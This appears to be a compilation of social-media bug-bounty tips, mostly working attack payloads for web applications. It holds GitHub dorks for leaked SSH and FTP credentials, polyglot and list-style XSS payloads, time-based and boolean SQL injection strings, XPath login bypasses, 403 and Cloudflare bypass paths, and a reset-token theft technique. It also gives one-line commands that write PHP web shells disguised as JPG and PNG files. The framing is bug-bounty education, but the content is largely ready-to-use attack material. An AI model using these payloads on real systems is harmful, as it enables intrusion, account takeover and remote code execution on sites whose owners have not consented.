The new search allows for regex, which means brand **new** regex GitHub Dorks are possible!
Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
#infosec
#cybersecurite
#bugbountytip
If you run a bruteforce and notice weird behaviours - like "/admin/" redirecting to / always investigate these.
/admin/
/admin/../admin
//admin/
/Admin/
/admin;/
/Admin;/
/index.php/admin/
/admin/js/*.js
/admin/*brute*.ext
/admin../admin
//anything/admin/
#infosec
The best single
#XSS
vector you'll ever have! Payload :
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
1:- Use
@fasthm00
2:- Import to burpsuite match and replace.
3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p
http://127.0.0.1:8080
4:- The Blind xss payload will added automatically by burp and gospider.
Finally:- 4 BLIND XSS REPORTS.
Time-based SQLi with two payloads injected in the following headers:
1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR"
2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
#sqli
#cybersecuritytips
#infosecurity
#bugbountytip
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇.
#bugbountyTips
#bugbounty
.
Testing SQLI in Api's?
Always start From : Boolean based >> Time based
{"id":"56456"} - OK
{"id":"56456 AND 1=1#"} -> OK
{"id":"56456 AND 1=2#"} -> OK
{"id":"56456 AND 1=3#"} -> ERROR
{"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC
#sqli
#infosec
#cybersecurity
#bugbountytips
Admin-Panal Bypass⚔️
XPath Injection
```
‘ or ‘1’=’1
‘ or ‘’=’
‘ or 1]%00
‘ or /* or ‘
‘ or “a” or ‘
‘ or 1 or ‘
‘ or true() or ‘
‘or string-length(name(.))<10 or’
‘or contains(name,’adm’) or’
‘or contains(.,’adm’) or’
‘or position()=2 or’
admin’ or ‘
admin’ or ‘1’=’2
```
testing 403 bypass..?
You found a /wp-admin with 403 status.
*) Bypass it using /wp-admin/setup-config.php?step=1
This will allow you to create a database.
From here, you can escalate it to any other big vulnerability :
#infosec
#bugbountytips
#cybersec
You can find deep domains without tools like this simple dorks: ⚡️
site:*.site.com -www
site:*.*.site.com -www
site:*.*.*.site.com -www
#infosec
#cybersec
#bugbounty
Account Takeover of every user
1) go to forgot password
2) capture Request in a burp
3) change refrer link into my burp collaborator link
4) got http request with Password reset token link of a victim
#infosecurity
#bugbountytips
#CyberSec
How to find authentication bypass vulnerabilities.
Focus. I Added headers. by
@jae_hak99
Request
GET /delete?user=test HTTP/1.1
Response
HTTP/1.1 401 Unauthorized
Reqeust
GET /delete?user=test HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 302 Found
#bugbounty
Find SSRF on all your huge target list via httpx:-
1:- Download
2:- Add on {target}
3:- Run httpx.
httpx -paths ssrf-parameters.txt -threads 200 -o ssrf.txt
4:- Screenshot the result
gowitness file -f ssrf.txt
#infosec
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload.
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
#bugbounty
#infosecurity
#cybersec
Add to your list
#SQL
#injection
payload By
@lu3ky13
1%27/**/%256fR/**/50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
Did you know the shortest
#payload
to achieve code execution in
#PHP
is only 15 bytes long ? If you can inject it in a page on the site you will achieve remote code execution! This is really useful in
#BugBounty
or
#pentest
when you have a limited input size.
thread👇
E-mail address payloads📓
The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
1/.XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)
@example
.com test
@example
(<script>alert(0)</script>).com "
List of GitHub Dorks for bug bounties . like Finding
target Files, Languages , API Keys,
Tokens,Usernames,Passwords,Information using
Dates,Extension 📓
#infosec
#cybersec
#bugbountytips
403 Forbidden bypass 🫰
GET /admin = 403 Forbidden
GET /random-dir/../admin = 200 OK
Cloudflare IP Restriction bypass 🫰
GET /admin = Error 1006 (Cloudflare)
GET /admin? = 200 OK
#infosec
#cybersec
#bugbountytips
Here's a small
#XSS
list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on:
- URL query, fragment & path;
- all input fields.